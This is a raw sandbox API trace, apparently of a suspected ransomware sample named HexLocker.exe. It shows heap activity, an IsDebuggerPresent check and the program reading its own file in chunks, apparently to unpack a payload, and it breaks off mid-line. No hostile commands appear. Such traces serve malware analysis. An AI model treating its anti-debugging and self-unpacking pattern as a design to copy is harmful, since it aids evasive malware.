[0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f60 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976978 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9768d0 | out: hHeap=0x970000) returned 1 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976f00 | out: hHeap=0x970000) returned 1 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a08 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f70 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a08 | out: hHeap=0x970000) returned 1 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976f70 | out: hHeap=0x970000) returned 1 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a20 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976e30 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x977628 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976ff0 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976e70 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9769c0 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976888 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a68 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fb0 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a68 | out: hHeap=0x970000) returned 1 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fb0 | out: hHeap=0x970000) returned 1 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976888 | out: hHeap=0x970000) returned 1 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a20 | out: hHeap=0x970000) returned 1 [0121.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976e30 | out: hHeap=0x970000) returned 1 [0121.462] IsDebuggerPresent () returned 0 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x971da0 [0121.463] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", nBufferLength=0x104, lpBuffer=0x4a7f6c, lpFilePart=0x8cf9ec | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", lpFilePart=0x8cf9ec*="HexLocker.exe") returned 0x25 [0121.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x971da0 | out: hHeap=0x970000) returned 1 [0121.463] SHGetMalloc (in: ppMalloc=0x8cf9ec | out: ppMalloc=0x8cf9ec*=0x74b3d000) returned 0x0 [0121.528] SHGetDesktopFolder (in: ppshf=0x8cf9e8 | out: ppshf=0x8cf9e8*=0xa66c2c) returned 0x0 [0121.627] IShellFolder:ParseDisplayName (in: This=0xa66c2c, hwnd=0x0, pbc=0x0, pszDisplayName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", pchEaten=0x8cf9e0*=0x971da0, ppidl=0x8cf9e4, pdwAttributes=0x0 | out: pchEaten=0x8cf9e0*=0x0, ppidl=0x8cf9e4, pdwAttributes=0x0) returned 0x0 [0121.755] SHGetPathFromIDListW (in: pidl=0xa78828, pszPath=0x8cf5c8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe") returned 1 [0121.767] IMalloc:Free (This=0x74b3d000, pv=0xa78828) [0121.767] IUnknown:Release (This=0xa66c2c) returned 0x0 [0121.767] IUnknown:AddRef (This=0x74b3d000) returned 0x1 [0121.767] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", nBufferLength=0x104, lpBuffer=0x8cf7d8, lpFilePart=0x8cf9e8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", lpFilePart=0x8cf9e8*="HexLocker.exe") returned 0x25 [0121.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x971da0 [0121.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976b10 [0121.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fd0 [0121.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976990 [0121.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f70 [0121.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0121.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x976f80 [0121.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x976f80, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0121.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976f80 | out: hHeap=0x970000) returned 1 [0121.767] GetLastError () returned 0x0 [0121.768] SetLastError (dwErrCode=0x0) [0121.768] GetLastError () returned 0x0 [0121.768] SetLastError (dwErrCode=0x0) [0121.768] GetLastError () returned 0x0 [0121.768] SetLastError (dwErrCode=0x0) [0121.768] GetLastError () returned 0x0 [0121.768] SetLastError (dwErrCode=0x0) [0121.768] GetLastError () returned 0x0 [0121.768] SetLastError (dwErrCode=0x0) [0121.768] GetLastError () returned 0x0 [0121.768] SetLastError (dwErrCode=0x0) [0121.768] GetLastError () returned 0x0 [0121.768] SetLastError (dwErrCode=0x0) [0121.768] GetLastError () returned 0x0 [0121.769] SetLastError (dwErrCode=0x0) [0121.769] GetLastError () returned 0x0 [0121.769] SetLastError (dwErrCode=0x0) [0121.769] GetLastError () returned 0x0 [0121.769] SetLastError (dwErrCode=0x0) [0121.769] GetLastError () returned 0x0 [0121.769] SetLastError (dwErrCode=0x0) [0121.769] GetLastError () returned 0x0 [0121.769] SetLastError (dwErrCode=0x0) [0121.769] GetLastError () returned 0x0 [0121.769] SetLastError (dwErrCode=0x0) [0121.769] GetLastError () returned 0x0 [0121.769] SetLastError (dwErrCode=0x0) [0121.769] GetLastError () returned 0x0 [0121.769] SetLastError (dwErrCode=0x0) [0121.769] GetLastError () returned 0x0 [0121.770] SetLastError (dwErrCode=0x0) [0121.770] GetLastError () returned 0x0 [0121.770] SetLastError (dwErrCode=0x0) [0121.770] GetLastError () returned 0x0 [0121.770] SetLastError (dwErrCode=0x0) [0121.770] GetLastError () returned 0x0 [0121.770] SetLastError (dwErrCode=0x0) [0121.770] GetLastError () returned 0x0 [0121.770] SetLastError (dwErrCode=0x0) [0121.770] GetLastError () returned 0x0 [0121.770] SetLastError (dwErrCode=0x0) [0121.770] GetLastError () returned 0x0 [0121.770] SetLastError (dwErrCode=0x0) [0121.770] GetLastError () returned 0x0 [0121.770] SetLastError (dwErrCode=0x0) [0121.770] GetLastError () returned 0x0 [0121.771] SetLastError (dwErrCode=0x0) [0121.771] GetLastError () returned 0x0 [0121.771] SetLastError (dwErrCode=0x0) [0121.771] GetLastError () returned 0x0 [0121.771] SetLastError (dwErrCode=0x0) [0121.771] GetLastError () returned 0x0 [0121.771] SetLastError (dwErrCode=0x0) [0121.771] GetLastError () returned 0x0 [0121.771] SetLastError (dwErrCode=0x0) [0121.771] GetLastError () returned 0x0 [0121.771] SetLastError (dwErrCode=0x0) [0121.771] GetLastError () returned 0x0 [0121.771] SetLastError (dwErrCode=0x0) [0121.771] GetLastError () returned 0x0 [0121.772] SetLastError (dwErrCode=0x0) [0121.772] GetLastError () returned 0x0 [0121.772] SetLastError (dwErrCode=0x0) [0121.772] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8cf674, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0121.772] GetFileType (hFile=0x288) returned 0x1 [0121.772] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.774] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0121.774] SetFilePointer (in: hFile=0x288, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0121.774] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.775] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0121.775] SetFilePointer (in: hFile=0x288, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0121.775] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.775] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0121.776] SetFilePointer (in: hFile=0x288, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0121.776] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.776] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0121.776] SetFilePointer (in: hFile=0x288, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0121.776] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.777] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ffb0 [0121.777] SetFilePointer (in: hFile=0x288, lDistanceToMove=327580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff9c [0121.777] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.778] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff9c [0121.778] SetFilePointer (in: hFile=0x288, lDistanceToMove=393096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff88 [0121.778] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.778] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff88 [0121.779] SetFilePointer (in: hFile=0x288, lDistanceToMove=458612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff74 [0121.779] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.779] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff74 [0121.779] SetFilePointer (in: hFile=0x288, lDistanceToMove=524128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff60 [0121.779] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.780] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff60 [0121.780] SetFilePointer (in: hFile=0x288, lDistanceToMove=589644, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff4c [0121.780] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.780] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff4c [0121.781] SetFilePointer (in: hFile=0x288, lDistanceToMove=655160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff38 [0121.781] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.781] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaff38 [0121.781] SetFilePointer (in: hFile=0x288, lDistanceToMove=720676, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaff24 [0121.781] ReadFile (in: hFile=0x288, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0121.782] SetFilePointer (in: hFile=0x288, lDistanceToMove=726548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb1614 [0121.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1000) returned 0x977848 [0121.782] ReadFile (in: hFile=0x288, lpBuffer=0x977848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bf65c, lpOverlapped=0x0 | out: lpBuffer=0x977848*, lpNumberOfBytesRead=0x8bf65c*=0x1000, lpOverlapped=0x0) returned 1 [0121.782] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf68c | out: lpSystemTimeAsFileTime=0x8cf68c*(dwLowDateTime=0xeea523f1, dwHighDateTime=0x1d67c7d)) [0121.782] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb2614 [0121.783] SetFilePointer (in: hFile=0x288, lDistanceToMove=726568, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb1628 [0121.783] ReadFile (in: hFile=0x288, lpBuffer=0x977848, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ced68, lpOverlapped=0x0 | out: lpBuffer=0x977848*, lpNumberOfBytesRead=0x8ced68*=0x200, lpOverlapped=0x0) returned 1 [0121.783] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ced54 | out: lpSystemTimeAsFileTime=0x8ced54*(dwLowDateTime=0xeea54bcc, dwHighDateTime=0x1d67c7d)) [0121.783] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ced54 | out: lpSystemTimeAsFileTime=0x8ced54*(dwLowDateTime=0xeea54bcc, dwHighDateTime=0x1d67c7d)) [0121.783] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ced54 | out: lpSystemTimeAsFileTime=0x8ced54*(dwLowDateTime=0xeea54bcc, dwHighDateTime=0x1d67c7d)) [0121.784] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb1828 [0121.784] SetFilePointer (in: hFile=0x288, lDistanceToMove=726743, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb16d7 [0121.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x677a) returned 0x2e50048 [0121.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1364) returned 0x978850 [0121.785] ReadFile (in: hFile=0x288, lpBuffer=0x978850, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x8cf1c8, lpOverlapped=0x0 | out: lpBuffer=0x978850*, lpNumberOfBytesRead=0x8cf1c8*=0x1200, lpOverlapped=0x0) returned 1 [0121.785] ReadFile (in: hFile=0x288, lpBuffer=0x977848, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cf1b8, lpOverlapped=0x0 | out: lpBuffer=0x977848*, lpNumberOfBytesRead=0x8cf1b8*=0x200, lpOverlapped=0x0) returned 1 [0121.785] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf1a4 | out: lpSystemTimeAsFileTime=0x8cf1a4*(dwLowDateTime=0xeea59929, dwHighDateTime=0x1d67c7d)) [0121.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20000) returned 0x2e567d0 [0121.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e767d8 [0121.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e867e0 [0121.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e567d0 | out: hHeap=0x970000) returned 1 [0121.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e767d8 | out: hHeap=0x970000) returned 1 [0121.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e867e0 | out: hHeap=0x970000) returned 1 [0121.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978850 | out: hHeap=0x970000) returned 1 [0121.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1714) returned 0x978850 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x979f70 [0121.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x979f70 | out: hHeap=0x970000) returned 1 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9768d0 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976870 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976930 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976858 [0121.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976870 | out: hHeap=0x970000) returned 1 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x9769f0 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9769d8 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976ed0 [0121.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769d8 | out: hHeap=0x970000) returned 1 [0121.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ed0 | out: hHeap=0x970000) returned 1 [0121.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769f0 | out: hHeap=0x970000) returned 1 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976828 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976900 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976840 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f80 [0121.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976840 | out: hHeap=0x970000) returned 1 [0121.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976f80 | out: hHeap=0x970000) returned 1 [0121.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976900 | out: hHeap=0x970000) returned 1 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976ab0 [0121.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x979f70 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a08 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x979f98 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976ea0 [0121.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x979f70 | out: hHeap=0x970000) returned 1 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x9769d8 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9769f0 [0121.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a08 | out: hHeap=0x970000) returned 1 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976948 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x979f70 [0121.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9768d0 | out: hHeap=0x970000) returned 1 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976ac8 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976a08 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x979fc0 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976a20 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976a38 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976840 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976870 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976a68 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976a80 [0121.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976ae0 [0121.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976828 | out: hHeap=0x970000) returned 1 [0121.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ab0 | out: hHeap=0x970000) returned 1 [0121.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769f0 | out: hHeap=0x970000) returned 1 [0121.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769d8 | out: hHeap=0x970000) returned 1 [0121.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976948 | out: hHeap=0x970000) returned 1 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ac8 | out: hHeap=0x970000) returned 1 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a08 | out: hHeap=0x970000) returned 1 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x976ab0 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976828 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fb0 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976828 | out: hHeap=0x970000) returned 1 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fb0 | out: hHeap=0x970000) returned 1 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ab0 | out: hHeap=0x970000) returned 1 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976828 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976ab0 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9768d0 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976eb0 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9768d0 | out: hHeap=0x970000) returned 1 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976eb0 | out: hHeap=0x970000) returned 1 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ab0 | out: hHeap=0x970000) returned 1 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x9768d0 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1a) returned 0x971df8 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976900 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x971e20 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976e60 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x971df8 | out: hHeap=0x970000) returned 1 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976ab0 [0121.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976888 [0121.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976900 | out: hHeap=0x970000) returned 1 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x9769d8 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x9769f0 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976a08 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x971df8 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x976900 [0121.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 